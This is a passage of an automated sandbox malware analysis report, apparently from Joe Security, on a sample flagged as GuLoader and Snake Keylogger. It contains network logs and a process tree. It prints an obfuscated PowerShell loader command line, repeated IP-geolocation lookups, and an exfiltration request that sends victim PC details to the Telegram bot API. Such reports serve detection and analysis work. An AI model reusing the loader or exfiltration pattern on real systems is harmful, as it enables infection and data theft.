Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sqEPi22pkuW7TpGNaXI3WleKJUpgGxAvxrVsO9k7kvUysNRFUJUEEYnZNa5oLlCRc5ImrS27XgyWZP%2FeTXiqGj1%2BrYOm6j4dAFaCaHeKl%2F9WXrCK3O5s885cZfYdU2%2BKPKh%2FCAI1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb145f793fc5bb-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=121513&min_rtt=39936&rtt_var=152633&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5700&recv_bytes=699&delivery_rate=7480&cwnd=242&unsent_bytes=0&cid=ae8324f5371f9de7&ts=1084&x=0"
2025-03-07 15:20:55 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 3
Source IP: 192.168.2.8 | Source Port: 49694 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 3488 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 15:20:57 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-03-07 15:20:58 UTC | 854 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:20:57 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3414
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YfIkhG9g8x6o1NVPFYvXuRFedADMHcgK%2Fh3awBGpREL2pYvN9rS8d3x9bC7yZcdpjSuBPkVYoGNTbtt1CWyAORYPw2ySfG9%2F3jQnQtr1ZumMFuHHb4xktB3Os2aRioaGUaR44Nqo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb14720b5e874e-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=123129&min_rtt=40516&rtt_var=154592&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7358&cwnd=126&unsent_bytes=0&cid=3ac535b8ecbf19a9&ts=1021&x=0"
2025-03-07 15:20:58 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 4
Source IP: 192.168.2.8 | Source Port: 49696 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 3488 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 15:21:00 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-03-07 15:21:01 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:01 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3417
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFOzgY5ZHkKpkuvUMqkNzTqEf1tSnBljmAZuvgEZuDSe%2FaVZmNqxZLAoGLBLoITL9HI3Wa4zyXHmZRei6pyDF7JAREtOIwGx0B3mzjBeD%2Bvww%2BMMq3mOQYfosTOUVhJTR%2FtDsH29"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb1486a8271fd6-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=121967&min_rtt=39917&rtt_var=153448&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7438&cwnd=186&unsent_bytes=0&cid=e31d80c8dc908f7e&ts=870&x=0"
2025-03-07 15:21:01 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 5
Source IP: 192.168.2.8 | Source Port: 49698 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 3488 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 15:21:04 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-03-07 15:21:05 UTC | 862 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:04 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3421
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lW9%2BwhM0XvjcNJhW%2FecQPzoMAsvrxHREjoIFpnvrDu%2BnobedvwOBkb3R3LxQzUFYasZIfPdw9Au3M1POpvD5SzGnbXQg0g7m0Gv%2BXuAs2X%2BLDvMkPZck%2BY2eYN5BlFolBvCz77x"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb149cada49c61-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=119722&min_rtt=37740&rtt_var=152751&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7462&cwnd=252&unsent_bytes=0&cid=6ea78442c51f3ae6&ts=1068&x=0"
2025-03-07 15:21:05 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.8  49700        104.21.80.1     443               3488  C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-03-07 15:21:07 UTC   Bytes transferred: 85   Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2025-03-07 15:21:08 UTC   Bytes transferred: 862   Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:08 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cf-Ray: 91cb14b2bc56c9bc-IAD
Server: cloudflare
Age: 3424
Cache-Control: max-age=31536000
Cf-Cache-Status: HIT
Last-Modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2CfdVqgaZt%2FpOw%2F2ylVpYhsbCluJU%2BAy6G7vnyt1UBXJP1hrhhQPD1bGQ479fYOMRaJxvfE2UZPr%2F1UNKEdOAk9H9H5skIvOYAIs32%2Bo07QUPJyXD7gqEQtIqIpu33n5fIpyB47"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=120712&min_rtt=39808&rtt_var=151430&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7522&cwnd=250&unsent_bytes=0&cid=708e7fab0e6265b1&ts=1017&x=0"
Timestamp: 2025-03-07 15:21:08 UTC   Bytes transferred: 362   Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.8  49702        104.21.80.1     443               3488  C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-03-07 15:21:11 UTC   Bytes transferred: 85   Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2025-03-07 15:21:11 UTC   Bytes transferred: 856   Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:11 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3427
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FM2IPuAiLUzHpuuP6nYfXieEz7GUJ1UE5mipVAYZQFsQLjXMeNMp1gZazX%2FOlGVkFT5p%2BXecwvM76Ay4NcRFeZOVtkl9JJk9MEe3HJY6SQEq4XZmtXRMiN%2FHdeQZwmaNjrT5J3RO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb14c879613973-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=121151&min_rtt=39769&rtt_var=152248&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5700&recv_bytes=699&delivery_rate=7491&cwnd=226&unsent_bytes=0&cid=01adfa12ce2b7884&ts=1021&x=0"
Timestamp: 2025-03-07 15:21:11 UTC   Bytes transferred: 362   Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.8  49704        104.21.80.1     443               3488  C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-03-07 15:21:15 UTC   Bytes transferred: 85   Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2025-03-07 15:21:15 UTC   Bytes transferred: 856   Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:15 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3431
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfIuBc6CyUVFC6P%2Fp2LXPWNl7Tzqcyc9c2IT18eMtegUCqx7pkphS8UouYuuP7YnZrzwHoCqImoEJ97EARE8v9u%2F0U3sD6Xd81WTT7tYVzTOJvwLIrlTuGh5G7w0iqDzQTx5%2BSZo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb14df1d66d678-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=122444&min_rtt=41295&rtt_var=152307&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5696&recv_bytes=699&delivery_rate=7469&cwnd=251&unsent_bytes=0&cid=5a25b2433f07a67d&ts=1174&x=0"
Timestamp: 2025-03-07 15:21:15 UTC   Bytes transferred: 362   Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.8  49706        104.21.80.1     443               3488  C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-03-07 15:21:18 UTC   Bytes transferred: 85   Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2025-03-07 15:21:18 UTC   Bytes transferred: 859   Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:18 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3434
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIulPm8LaWNStSjI8wgpQ%2BHp3AzKn68mjFNjdSu6l4JE56QwKPX%2ByY8W%2BtJnXvgw0pw9jPLUKZvdJAJsZskYiBAdOhNb87hkprwSaM1QVqyQbqvs1FQ%2FH3qEFdb5P6Nl3%2BYhtohQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb14f4390556c2-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=127873&min_rtt=47854&rtt_var=152139&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4248&recv_bytes=699&delivery_rate=7433&cwnd=147&unsent_bytes=0&cid=3ac54badf1da8180&ts=929&x=0"
Timestamp: 2025-03-07 15:21:18 UTC   Bytes transferred: 362   Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.8  49708        104.21.80.1     443               3488  C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-03-07 15:21:22 UTC   Bytes transferred: 61   Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org

Timestamp: 2025-03-07 15:21:22 UTC   Bytes transferred: 855   Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:22 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3438
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9McMUDVzS7PguVkivQ%2B7Lbs324iK8ljNINmk6zcYlgSJ3X6AwpQv3Zuf4qE2qIZ6CKk1D3OCLZrItYaOcZ5ZA144jfM3M%2BeuKGAjmsqXAw8zx4VvkDx6AoPfzJ%2BLvpWVjD70bwQU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91cb150baf411fe2-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=124590&min_rtt=44261&rtt_var=151686&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5696&recv_bytes=699&delivery_rate=7489&cwnd=184&unsent_bytes=0&cid=0489b639664e1ab1&ts=983&x=0"
Timestamp: 2025-03-07 15:21:22 UTC   Bytes transferred: 362   Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
11          192.168.2.8  49709        149.154.167.220  443               3488  C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-03-07 15:21:25 UTC   Bytes transferred: 349   Direction: OUT
Data:
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Timestamp: 2025-03-07 15:21:26 UTC   Bytes transferred: 344   Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 07 Mar 2025 15:21:25 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2025-03-07 15:21:26 UTC 55 IN Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:10:19:55
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\uPDwUy9ewY.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:509'800 bytes
                                                                                                                                                                          MD5 hash:0425118557AA95EA418A0B15DD072078
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:10:19:57
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"
                                                                                                                                                                          Imagebase:0xf90000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1284819779.000000000A212000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:10:19:57
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff6e60e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:10:20:28
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                          Imagebase:0x7ff66acf0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:10:20:32
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2126368645.0000000005712000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false
